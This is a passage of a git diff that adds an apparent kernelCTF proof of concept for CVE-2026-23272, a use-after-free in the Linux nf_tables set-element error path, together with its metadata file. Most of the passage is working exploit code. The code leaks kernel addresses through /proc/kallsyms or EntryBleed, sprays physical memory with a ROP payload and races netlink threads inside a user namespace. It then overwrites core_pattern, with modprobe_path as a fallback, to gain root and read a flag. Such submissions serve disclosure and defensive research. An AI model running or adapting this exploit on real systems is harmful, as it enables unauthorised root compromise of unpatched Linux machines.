cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); + return; + } + printf("[*] timing-ranked selection empty, falling back to uniform offsets\n"); + } + + int ncands = MAX_CANDS; + uint64_t step = (init_size / static_cast(ncands)) & ~0xFFFULL; + if (step < 0x1000) step = 0x1000; + for (int i = 0; i < ncands && num_cands3d < MAX_CANDS; i++) { + uint64_t off = static_cast(i) * step; + if (off + off_init_begin >= off_init_end) off = init_size - 0x1000; + add_cand(kb, 0, off_init_begin + off); + } + + printf("[*] generated %d candidates (budget=%ds, cycle=%ds)\n", + num_cands3d, RACE_SECONDS, CYCLE_SECONDS); +} + +/* ========== exploit child (runs in namespace) ========== */ +static void on_alarm(int sig) { + (void)sig; + g_stop = 1; +} + +static int race_exploit_child(int cycle_secs) { + setup_ns(); + + struct nlsock ns = nl_open(); + if (ns.fd < 0) die("netlink"); + int fl = fcntl(ns.fd, F_GETFL, 0); + fcntl(ns.fd, F_SETFL, fl & ~O_NONBLOCK); + + int err = vuln_setup_nft(ns.fd, ns.pid); + if (err < 0) { + fprintf(stderr, "[-] nft setup: %d\n", err); + return 1; + } + printf("[+] nft objects ready\n"); + fcntl(ns.fd, F_SETFL, fl | O_NONBLOCK); + + /* Start race threads */ + g_stop = 0; + signal(SIGALRM, on_alarm); + signal(SIGTERM, on_alarm); + alarm(static_cast(cycle_secs + ALARM_GRACE_SEC)); + + #define N_THREADS 2 + pthread_barrier_t bar; + pthread_barrier_init(&bar, nullptr, N_THREADS); + + struct race_args ra = {}; + ra.writer_fd = ns.fd; + ra.writer_pid = ns.pid; + ra.bar = &bar; + ra.chain_kva = g_page_kva; + + pthread_t threads[N_THREADS]; + pthread_create(&threads[0], nullptr, race_writer_thread, &ra); + pthread_create(&threads[1], nullptr, race_packet_thread, &ra); + + printf("[*] racing for %ds...\n", cycle_secs); + while (!g_stop) { + // @sleep(desc="poll loop waiting for race cycle to complete") + sleep_ms(100); + } + + g_stop = 1; + for (int i = 0; i < N_THREADS; i++) + pthread_join(threads[i], nullptr); + close(ns.fd); + return 0; +} + +/* ========== memory sizing ========== */ +// @step(name="Auto-size Physmap Spray") +static void setup_auto_physmap_size(void) { + FILE *f = fopen("/proc/meminfo", "r"); + if (!f) return; + char line[256]; + while (fgets(line, sizeof(line), f)) { + unsigned long kb; + if (sscanf(line, "MemTotal: %lu kB", &kb) == 1) { + int avail = static_cast(kb / 1024); + int cap = avail * 2 / 5; + if (cap < 128) cap = 128; + if (cap > 2048) cap = 2048; + if (physmap_mb > cap) physmap_mb = cap; + printf("[*] RAM=%dMB, physmap capped to %dMB\n", avail, physmap_mb); + break; + } + } + fclose(f); +} + +/* ========== main exploit ========== */ +// @step(name="Main Exploit Loop") +int main(int argc, char **argv) { + setbuf(stdout, nullptr); + setbuf(stderr, nullptr); + + uint64_t cli_kb = 0, cli_pb = 0; + bool cli_kb_seen = false, cli_pb_seen = false; + + /* --vuln-trigger: trigger vulnerability for KASAN verification, + * skipping KASLR bypass, physmap spray, and full exploitation. */ + for (int i = 1; i < argc; i++) { + if (strcmp(argv[i], "--vuln-trigger") == 0) { + printf("=== --vuln-trigger: triggering err_set_full UAF for KASAN ===\n"); + g_page_kva = 0; + return race_exploit_child(VULN_TRIGGER_SECS); + } + uint64_t v = 0; + if (parse_u64_arg(argv[i], &v)) { + if (!cli_kb_seen) { + cli_kb = v; + cli_kb_seen = true; + } else if (!cli_pb_seen) { + cli_pb = v; + cli_pb_seen = true; + } + } + } + + printf("=== COS-113 err_set_full UAF exploit (kernelXDK) ===\n"); + + /* Initialize kernelXDK -- resolve offsets from target database */ + xdk_init_offsets(); + + setup_auto_physmap_size(); + + /* Preferred external leak input path: + * argv[1]=kbase (optionally argv[2]=phbase), as used by repro init.sh. */ + if (cli_kb_seen) { + /* init.sh can pass 0 when /proc/kallsyms is masked. Under nokaslr, + * use the canonical x86_64 base instead of falling back to EntryBleed. */ + if (cli_kb == 0 && kernel_cmdline_has_token("nokaslr")) { + cli_kb = 0xffffffff81000000ULL; + printf("[*] argv kbase was 0; using nokaslr fallback %#lx\n", + (unsigned long)cli_kb); + } + + kbase = cli_kb; + phbase = cli_pb ? cli_pb : 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using argv: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + /* Check for environment-provided addresses (nokaslr local testing) */ + uint64_t env_kb = env_u64("KBASE"), env_pb = env_u64("PHYSBASE"); + if (env_kb && env_pb) { + kbase = env_kb; + phbase = env_pb; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using env: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + if (kernel_cmdline_has_token("nokaslr")) { + kbase = 0xffffffff81000000ULL; + phbase = 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using nokaslr fallback: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + /* Integrated direct leak path for CI/repro with KASLR enabled. */ + uint64_t proc_kb = leak_kbase_proc_kallsyms(); + if (proc_kb) { + kbase = proc_kb; + phbase = 0xffff888000000000ULL; + eb_kbases[0] = kbase; + eb_nkb = 1; + eb_phbases[0] = phbase; + eb_npb = 1; + printf("[+] using /proc/kallsyms: kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + } else { + leak_entrybleed(); + if (!kbase || !phbase) { + fprintf(stderr, "[-] entrybleed failed completely\n"); + return 1; + } + } + } + } + } + printf("[+] primary kbase=%#lx phbase=%#lx\n", + (unsigned long)kbase, (unsigned long)phbase); + printf("[+] kbase candidates: %d, phbase candidates: %d\n", eb_nkb, eb_npb); + + setup_payload(); + spray_physmap(); + + /* Try to get exact KVA from pagemap (works on local QEMU, not on kctf) */ + uint64_t exact_kva = leak_physmap_kva(); + if (exact_kva) { + printf("[+] exact KVA from pagemap: %#lx\n", (unsigned long)exact_kva); + cands3d[0] = {kbase, 0, exact_kva - kbase}; + num_cands3d = 1; + } else { + setup_generate_candidates(); + } + + struct timespec race_start; + clock_gettime(CLOCK_MONOTONIC, &race_start); + + int won = 0; + uint64_t prev_kb = 0; + + for (int ci = 0; ci < num_cands3d && !won; ci++) { + /* Check total timeout */ + struct timespec now; + clock_gettime(CLOCK_MONOTONIC, &now); + long elapsed = now.tv_sec - race_start.tv_sec; + if (elapsed >= RACE_SECONDS) { + printf("[-] total timeout (%ds) reached at candidate %d/%d\n", + RACE_SECONDS, ci, num_cands3d); + break; + } + + /* Update globals for this candidate */ + kbase = cands3d[ci].kbase; + g_page_kva = kbase + cands3d[ci].kva_off; + + /* Print header when kbase changes */ + if (kbase != prev_kb) { + printf("\n[*] --- kbase=%#lx (init range %#lx-%#lx) ---\n", + (unsigned long)kbase, + (unsigned long)(kbase + off_init_begin), + (unsigned long)(kbase + off_init_end)); + prev_kb = kbase; + } + printf("[*] cand %d/%d: kva=%#lx (init+%#lx) [%lds]\n", + ci+1, num_cands3d, (unsigned long)g_page_kva, + (unsigned long)(cands3d[ci].kva_off - off_init_begin), elapsed); + + /* Refill physmap with ROP blob for current (kbase, kva) */ + rop_fill_physmap(); + + int cycle_secs = (num_cands3d == 1) ? RACE_SECONDS : CYCLE_SECONDS; + + pid_t child = fork(); + if (child < 0) die("fork"); + if (child == 0) _exit(race_exploit_child(cycle_secs)); + + /* Parent: poll core_pattern while child races */ + for (int t = 0; t < cycle_secs * 2 && !won; t++) { + // @sleep(desc="poll interval waiting for core_pattern overwrite") + sleep_ms(POLL_INTERVAL_MS); + if (setup_check_core_pattern()) { + printf("[+] GOT ROOT - core_pattern overwritten!\n"); + // @sleep(desc="grace period before triggering core dump") + sleep_ms(KILL_GRACE_MS); + setup_trigger_core_dump(); + printf("[*] waiting for core dump handler (dd -> ttyS0)...\n"); + // @sleep(desc="wait for core dump handler to write flag to serial") + sleep_ms(CORE_DUMP_WAIT_MS); + printf("[+] ROOT OUTPUT - flag should be on serial\n"); + int fd = open("/tmp/flag", O_RDONLY); + if (fd >= 0) { + char buf[4096]; + ssize_t n = read(fd, buf, sizeof(buf)-1); + close(fd); + if (n > 0) { + buf[n] = 0; + printf("[+] FLAG:\n%s\n", buf); + } + } + won = 1; + break; + } + int status; + if (waitpid(child, &status, WNOHANG) > 0) { + printf("[*] child exited early (status=%d sig=%d)\n", + WIFEXITED(status) ? WEXITSTATUS(status) : -1, + WIFSIGNALED(status) ? WTERMSIG(status) : 0); + child = 0; + break; + } + } + + if (child > 0) { + kill(child, SIGTERM); + // @sleep(desc="grace period for child to handle SIGTERM before SIGKILL") + sleep_ms(KILL_GRACE_MS); + kill(child, SIGKILL); + waitpid(child, nullptr, 0); + } + } + + /* Fallback: try modprobe_path (for local QEMU testing) */ + if (!won) { + printf("[*] trying modprobe_path fallback...\n"); + for (int i = 0; i < 5 && !won; i++) { + if (setup_try_modprobe()) { + won = 1; + break; + } + // @sleep(desc="delay between modprobe_path fallback retries") + sleep_ms(MODPROBE_RETRY_MS); + } + } + + if (won) { + printf("\n[+] SUCCESS\n"); + return 0; + } + printf("\n[-] exploit did not achieve root\n"); + return 1; +} diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb new file mode 100644 index 000000000..b47d2547a Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/exploit/cos-113-18244.521.98/target_db.kxdb differ diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json b/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json new file mode 100644 index 000000000..5b6c92128 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2026-23272_cos/metadata.json @@ -0,0 +1,30 @@ +{ + "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json", + "submission_ids": ["exp451"], + "vulnerability": { + "summary": "Use-after-free in nft_add_set_elem() err_set_full path due to freeing an RCU-published set element when insertion into a full set fails", + "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=def602e498a4f951da95c95b1b8ce8ae68aa733a", + "cve": "CVE-2026-23272", + "affected_versions": [ + "4.9.33 - 6.18.16", + "6.19 - 6.19.6", + "7.0-rc1 - 7.0-rc2" + ], + "requirements": { + "attack_surface": ["userns"], + "capabilities": ["CAP_NET_ADMIN"], + "kernel_config": [ + "CONFIG_NETFILTER", + "CONFIG_NF_TABLES", + "CONFIG_NF_TABLES_INET" + ] + } + }, + "exploits": { + "cos-113-18244.521.98": { + "uses": ["userns"], + "requires_separate_kaslr_leak": true, + "stability_notes": "Probabilistic. Depends on __init_begin page reclaim and in-batch SLUB LIFO reclaim timing. Typically needs multiple candidate cycles (~20s each). Auto-retries through 13 candidates within a 260s budget." + } + } +} diff --git a/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz b/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz new file mode 100644 index 000000000..9f759fa55 Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2026-23272_cos/original.tar.gz differ